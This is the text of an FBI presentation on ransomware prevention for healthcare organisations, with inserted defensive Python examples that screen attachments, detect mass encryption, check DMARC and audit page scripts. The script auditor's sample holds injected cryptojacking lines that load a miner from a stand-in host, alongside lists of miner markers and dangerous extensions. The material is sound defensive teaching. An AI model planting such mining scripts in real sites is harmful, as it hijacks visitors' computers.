
8/12/2019 1

Ransomware and Digital Extortion

Prevention and Recovery

Presented By: CS-FO Thomas Gilchrist, FBI-Oklahoma City
On Behalf Of: Explore Healthcare Summit 2019

My Bio

  • 2007: Intern at FBI-Birmingham
  • 2008: SSC/SST/OST at FBI-Birmingham
  • 2009: B.S. in Criminal Justice at UAB
  • 2013: M.S. in CIS at UAB
  • 2015: CS-FO at FBI-OKC
  • 2018: Adjunct Faculty at UCO

Today’s Objectives

  • Overview of Ransomware/Digital Extortion and the Threat to the Healthcare Industry
  • Case Studies of Healthcare Ransomware Attacks
  • Ransomware Tips/Strategies for Prevention, Mitigation, Preparation and Recovery
  • Law Enforcement Involvement Considerations
  • Overview of Other Cyber Attacks
    – Denial-of-Service, Data Theft, Business Email Compromise, Malvertising, Cryptojacking
  • Q and A

Ransomware and Digital Extortion

  • Digital Extortion is the act of coercing an individual or company to pay to access stolen or hidden cyber assets
    – Ransomware is the most common weapon for achieving this
    – 2016 was the “Year of Ransomware”

Two Types of Ransomware

  • #1: Locker
    – “Locks down” a digital device
    – Blocks the user’s ability to access anything on the system until the ransom is paid
    – Files remain intact (just not accessible)
    – Common requested payment is prepaid cards and vouchers
    – Most commonly targets mobile devices
  • #2: Crypto
    – Weaponizes encryption
    – Searches through files on a system targeting specific file extensions
    – Encrypts targeted files and drops a ransom note for payment in exchange for the private key (required for decryption)
    – Common payment is cryptocurrency (Bitcoin)

Locker Ransomware


Crypto Ransomware

[Figure: ransom note, encrypted files and targeted file extensions]

Ransom Notes

[Figure: text-file and HTML splash-page ransom notes]

Healthcare is Under Attack

  • Some 2019 Statistics:
    – 89% of healthcare organizations have experienced a data breach in the past 2 years
    – 50% of healthcare organizations have experienced a ransomware incident within 1 year
    – Average loss from ransomware for a business is $133,000
    – Estimated losses for the healthcare industry in 2019 are $25 billion
  • Reasons Healthcare Is Targeted:
    – Significant amount of PII in its data
    – Downtime of systems means downtime in patient care
    – It’s profitable!

Case Study #1: Hollywood Presbyterian

  • 2016 – First well-documented attack on healthcare
  • Hollywood Presbyterian Medical Center
    – Los Angeles, CA
  • Targeted by Locky ransomware
    – Delivered through a VBA macro embedded in a Word document
  • 10 Days of Downtime
    – Systems for lab work, pharmaceutical orders, and emergency room inaccessible
  • Paid $17,000 Bitcoin ransom

Case Study #2: MedStar Health

  • 2016 – First multi-site attack
  • Affected 10 hospitals and more than 250 outpatient centers
    – Baltimore/DC Area
  • Targeted by SamSam ransomware
    – Delivered via Web App security vulnerability (a patch existed)
  • Mass confusion caused by multi-site compromise
  • Paid $19,000 Bitcoin ransom
  • Two Iranian hackers indicted in 2018 by DOJ
    – Made roughly $6 million and caused $30 million in damages

Case Study #3: To Pay or Not to Pay

  • 2016 – Kansas Heart Hospital
    – Wichita, KS
  • Paid initial ransom
    – Partial file access
    – Second ransom demand
  • 2016 – Christopher Rural Health
    – Christopher, IL
  • Did not pay ransom
    – Restored from backups!
  • The FBI DOES NOT support ransom payment
    – Cyber Division Assistant Director James Trainor
  • Reasons:
    – Access to files is not a guarantee (see Kansas Heart)
    – Payment can fund other criminal enterprises
    – Payment sets a bad precedent and emboldens criminals


2019 Attacks Continue…

  • While ransomware attacks are on the decline for most industries, this is not the case for healthcare
    – Due to the success rate of these organizations paying ransoms quickly to regain access to important data, and a lack of preparedness
  • NEO Urology
    – Paid $75,000 ransom
    – Suffered 3 days of downtime
  • Estes Park Health
    – Insurance paid the ransom…TWICE
    – Paid $10,000 deductible on ransom payment
  • Olean Medical Group
  • Seneca Nation Health System
  • Shingle Springs Health and Wellness Center
  • Boston Residex Software

Ransomware Prevention

  • Prevention of ransomware is associated with understanding common delivery mechanisms and “plugging those holes”
    – Prevent the malware from getting on your systems in the first place!
  • Common Initial Attack Vectors
    – Phishing/Email Attachments
    – Social Engineering
    – Vulnerability Exploit Kits
    – Hacking
  • Let’s discuss some techniques to prevent each of these…

Phishing/Social Engineering

  • Continual education of employees against phishing attacks and social engineering is critical
  • Train employees to never open email attachments with certain suspicious file extensions: exe, vbs, js, ps
  • Turn off JavaScript execution in Adobe Reader for PDFs
  • Turn off Flash player execution in browsers
  • Be VERY cautious of Microsoft Office VBA Macros
    – Often code that reaches out to a malicious server to download and execute malware
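As an added example (not from the slides), a Python attachment screen that applies the extension list above, reading “ps” as PowerShell scripts (.ps1), and also catches double extensions such as invoice.pdf.exe and macro-enabled Office files; every extension beyond the four the slide names is an assumption:

```python
import os

# The slide names exe, vbs, js and ps; "ps" is read here as PowerShell (.ps1).
# The remaining entries in these sets are added as an assumption, not from the slide.
EXECUTABLE_EXTS = {".exe", ".vbs", ".js", ".jse", ".ps1", ".scr", ".bat", ".cmd", ".hta", ".wsf"}
MACRO_EXTS = {".docm", ".xlsm", ".pptm", ".dotm"}        # macro-enabled Office formats
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}

def screen_attachment(filename):
    """Return (verdict, reason) for an attachment file name.

    verdict is "block" (executable or script), "review" (macro-enabled Office
    document, hold for a human) or "allow". Trailing spaces and dots are
    stripped first because Windows ignores them when launching a file.
    """
    name = filename.strip().rstrip(". ").lower()
    root, ext = os.path.splitext(name)
    if ext in EXECUTABLE_EXTS:
        # "invoice.pdf.exe": the inner extension is a disguise, so call it out
        _, inner = os.path.splitext(root)
        if inner in DOCUMENT_EXTS:
            return ("block", f"executable disguised as {inner} document ({ext})")
        return ("block", f"executable or script attachment ({ext})")
    if ext in MACRO_EXTS:
        return ("review", f"macro-enabled Office document ({ext}); open only after verification")
    return ("allow", f"no dangerous extension ({ext or 'none'})")
```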


More Email Tips

  • Train employees to be cautious with links
    – Shortened links are suspicious; sites exist to expand shortened links without visiting them (checkshorturl.com)
    – Be aware a link can say it will send you one place and redirect you to a malicious site to download malware
    – Be aware legitimate sites can host ads that direct to malware
      • See Malvertising later…
  • Train employees to be cautious with unknown storage media
    – USBs exist that pose as a “virtual keyboard”, entering commands into a system when plugged in; they execute commands on the system with no user interaction!

Hacking

  • Hacking just means gaining unauthorized access to a network
    – It’s not always that sophisticated!
  • If the criminal can gain access to the network, they no longer need an employee to execute the malware…they can just do it themselves

Hacking/Vulnerabilities Tips

  • There are many ways to prevent unauthorized access
    – Block remote access unless absolutely necessary
    – Severely limit users that can remote access
    – Whitelist specific devices allowed remote access
    – Enforce strong passwords and Two Factor Authentication
    – Enable logging of proxies and VPN concentrators
    – Keep systems patched for security risks
    – Run automatic vulnerability scans for security risks
      • Nessus
    – Hire pen testers to test the network and your security team
      • White Hat Hackers
      • Be wary of vulnerability scanners posing as pen testers!

Ransomware Preparedness

  • Preparedness for ransomware is the process of putting protections in place to mitigate the damage of a ransomware attack BEFORE it occurs
  • #1 Key is BACKUPS!
    – BACKUP all operations-critical data
    – Backups should be AIR-GAPPED
      • Store OFFLINE and OFFSITE
  • Anti-Ransomware Software
    – Antivirus vendors are offering anti-ransomware software
    – Detects sudden mass changes to files and stops it from continuing
    – Companies like Malwarebytes are still Beta testing

Ransomware Preparedness Cont.

  • Engineer Network Architecture with Security Precautions
    – Utilize host and network security appliances like firewalls and intrusion detection/prevention systems
      • Configure with default-deny rules and event alerts instead of silent logs
    – Segment network with VLANs to prevent lateral movement
    – Use Virtual Machine environments
      • Snapshot to have restore points
    – Use Honeypots and Decoy Systems
    – Utilize a constant Network Security Monitoring team
      • Requires human inspection, not just IDS/IPS auto alerting

Incident Response and Recovery

  • Fully Develop Incident Response Plan
    – Fully scope your security landscape
      • Includes all sites and third parties with access like contractors/vendors
    – Fully identify job duties and roles
  • Typical plan:
    – Isolate infected systems from network
    – Identify the malware by researching encrypted file extensions
      • Some ransomware strains have known decryptors online!
    – Collect evidence for/report to law enforcement
      • Image compromised systems, memory captures of live compromised systems, security log files, malicious executables, phishing emails with headers
    – Restore systems via backups
    – Fix security flaw to prevent similar compromise
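The “sudden mass changes to files” that anti-ransomware software looks for (Preparedness) and the encrypted-file extension the response plan says to research are the same signal. As an added example, not from the slides or any vendor product, this Python detector slides a time window over file-change events per process and alerts when one process rewrites many files to a single new extension; the event format, thresholds, process names and paths are all constructed for the example:

```python
from collections import Counter, deque
from dataclasses import dataclass
import os

@dataclass
class FileEvent:
    ts: float       # seconds since monitoring started
    process: str    # image name of the process that wrote the file
    path: str       # file path after the write or rename

def detect_mass_encryption(events, window=10.0, threshold=20, min_ratio=0.8):
    """Alert on a process that touches >= threshold files within `window` seconds
    when >= min_ratio of them end in the same extension. The reported extension is
    what you search for when identifying the family and looking for a decryptor."""
    recent = {}          # process -> deque of its events inside the window
    alerted = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        q = recent.setdefault(ev.process, deque())
        q.append(ev)
        while ev.ts - q[0].ts > window:   # drop events that fell out of the window
            q.popleft()
        if len(q) >= threshold and ev.process not in alerted:
            ext, n = Counter(os.path.splitext(e.path)[1].lower() for e in q).most_common(1)[0]
            if n / len(q) >= min_ratio:
                alerted.add(ev.process)   # one alert per process
                alerts.append({"process": ev.process, "extension": ext,
                               "files": len(q), "first_seen": q[0].ts})
    return alerts

def sample_events():
    """Constructed sample: a word processor saving a handful of files, then an
    unknown process renaming 30 PDFs to *.locked within six seconds."""
    normal = [FileEvent(float(i), "winword.exe", f"C:/docs/letter{i}.docx")
              for i in range(5)]
    burst = [FileEvent(100.0 + 0.2 * i, "unknown.exe", f"C:/shares/patients/record{i}.pdf.locked")
             for i in range(30)]
    return normal + burst
```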


Law Enforcement Considerations

  • Things the FBI will not do:
    – Help restore your data
    – Determine who you should notify
  • Things the FBI will do:
    – Collect evidence for investigation
    – Indict the parties involved

Denial-of-Service

  • A denial-of-service (DoS) attack has one goal: make a networked service or resource unavailable
  • DoS is the older cousin of ransomware
  • There are two main methods:
    – Distributed DoS (DDoS): flood bandwidth with junk traffic
    – Exploit a bug/weakness in an application to cause it to freeze/crash

DoS Prevention and Recovery

  • There are several vendors of DDoS protection services
    – Such as Imperva Incapsula, Akamai, and Cloudflare
  • There are things your organization can do to mitigate attacks
    – Engineer the architecture to have real-time scalable bandwidth and design failsafes for system crashes
    – Use black hole routing to route malicious traffic to another destination to be dropped
    – Keep services and applications patched for known flaws
    – Configure firewalls and IDS/IPS to use rate limiting and traffic filtering
    – Use load balancing for important services
    – Use a CAPTCHA to prevent bot access to a resource


Data Theft

  • When a network is compromised, data theft is a real possibility
    – Targets Personally Identifying Information (PII) or trade secrets
  • Possible for data theft to occur prior to a ransomware attack

Data Theft Protections

  • The key to protecting data is to identify the data to be protected!
    – Knowledge is power…you must KNOW what is sensitive in your network
  • Design your network with protecting sensitive data in mind
    – Segment it away from publicly accessible network segments, behind security appliances
    – Restrict access with strong authentication
    – Store with encryption
    – Monitor access with logs and/or traffic captures/live monitoring
  • Most important means of protection is education about social engineering attacks!

Business Email Compromise

  • BEC refers to a group of attacks designed to trick businesses and/or their customers/vendors into redirecting payments to a criminal third party
    – Sometimes compromise legitimate business email accounts
    – Sometimes spoof (pretend to be) legitimate business email accounts
    – Sometimes use misspellings of business email accounts
  • Healthcare email fraud attacks have increased 473% in the past 2 years


BEC Prevention

  • Educate employees that make financial transfers
    – Implement a Two-Step Verification protocol in which all financial funds transfers and modifications are approved by a second party, preferably via phone
  • Protect your email accounts from unauthorized access
    – Avoid using free email account services like Gmail or Yahoo
    – Implement a Two-Factor Authentication solution
    – Monitor email forwarding rules
  • Protect from spoofed email
    – Utilize DMARC/DKIM to protect your domain from being spoofed
    – Utilize email spam filters
  • Protect from “similar sounding” domains
    – Consider buying rights to common domain misspellings
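Publishing DMARC only protects the domain if the policy actually tells receivers to reject spoofed mail. As an added example (not from the slides), this Python check parses a DMARC TXT record and lists the weaknesses that leave spoofing possible; the two records and the example.org domain are constructed placeholders, and DKIM signing itself is out of scope here:

```python
def parse_dmarc(record):
    """Split a DMARC TXT record ("v=DMARC1; p=reject; rua=mailto:...") into a tag dict."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags

def evaluate_dmarc(record):
    """Return the weaknesses in a published policy. An empty list means receivers
    are told to reject spoofed mail for the domain and its subdomains, and the
    domain owner receives aggregate reports about spoofing attempts."""
    tags = parse_dmarc(record)
    if tags.get("v") != "DMARC1":
        return ["not a DMARC record: missing v=DMARC1"]
    findings = []
    policy = tags.get("p", "none")
    if policy == "none":
        findings.append("p=none: receivers only report, spoofed mail is still delivered")
    elif policy == "quarantine":
        findings.append("p=quarantine: spoofed mail lands in spam rather than being rejected")
    elif policy != "reject":
        findings.append(f"p={policy}: unknown policy value")
    if tags.get("sp", policy) == "none" and policy != "none":
        findings.append("sp=none: subdomains can still be spoofed")
    pct = int(tags.get("pct", "100"))       # percentage of failing mail the policy covers
    if pct < 100:
        findings.append(f"pct={pct}: policy is applied to only {pct}% of failing messages")
    if "rua" not in tags:
        findings.append("no rua= address: nobody receives aggregate reports of spoofing attempts")
    return findings

# Constructed records for a placeholder domain; the real record is the DNS TXT
# entry at _dmarc.<yourdomain>.
WEAK_RECORD = "v=DMARC1; p=none; pct=50"
STRONG_RECORD = "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc-reports@example.org"
```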

Malvertising/Cryptojacking

  • Malvertising is a technique of using ad banners and pop-ups to download and execute malware onto a victim system
    – Some require the user to click the ad and others are “drive-by downloads”
    – Another delivery mechanism for ransomware too!
    – Best security is Pop-Up/Ad Blockers with AV or browser settings
  • Cryptojacking is a means of forcing a user’s system to mine cryptocurrency when visiting a web site
    – A legitimate web server is compromised to host a JavaScript file that embeds in a footer on the site’s pages; executed when viewed
    – The new malware threat of 2018-2019
    – Best security is minimizing user accounts that can edit site content and using good authentication of those accounts
    – Also look for suspicious JavaScript files and references to “Coinhive”
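The “look for suspicious JavaScript files and references to Coinhive” step can be automated against your own site’s pages. As an added example (not from the slides), this Python audit collects every script tag on a page and flags scripts loaded from hosts outside an allowlist or containing a miner marker; the sample footer, the allowlisted host and the markers other than “coinhive” are constructed assumptions:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
# "coinhive" is the marker the slide names; the other strings are added here as
# names used by browser-mining scripts of that era (assumption, extend as needed).
MINER_MARKERS = ("coinhive", "coin-hive", "cryptonight", "miner.start(")

class ScriptCollector(HTMLParser):
    # Collects every <script src=...> URL and every inline <script> body on a page.
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def audit_page(html, allowed_hosts):
    """Findings for scripts that should not be on the page: external scripts from hosts
    outside allowed_hosts (a relative src is the site itself) and any miner reference."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = (urlparse(src).hostname or "").lower()
        if any(m in src.lower() for m in MINER_MARKERS):
            findings.append(f"miner reference in script URL: {src}")
        elif host and host not in allowed_hosts:
            findings.append(f"script loaded from unapproved host: {host}")
    for body in collector.inline:
        if any(m in body.lower() for m in MINER_MARKERS):
            findings.append("inline script references a browser miner")
    return findings

# Constructed footer: the site's own script followed by two injected lines.
SAMPLE_FOOTER = """<footer><script src="/static/site.js"></script>
<script src="https://cdn.miner.example/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY'); miner.start();</script></footer>"""
```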

Contact Info and Q&A

CS-FO Thomas Gilchrist
tgilchrist@fbi.gov or thomas.gilchrist@ic.fbi.gov
405-290-3745

Main Office OKC-FBI
Ask to speak to the Duty Agent or an available Cyber Agent
405-290-7770

IC3.gov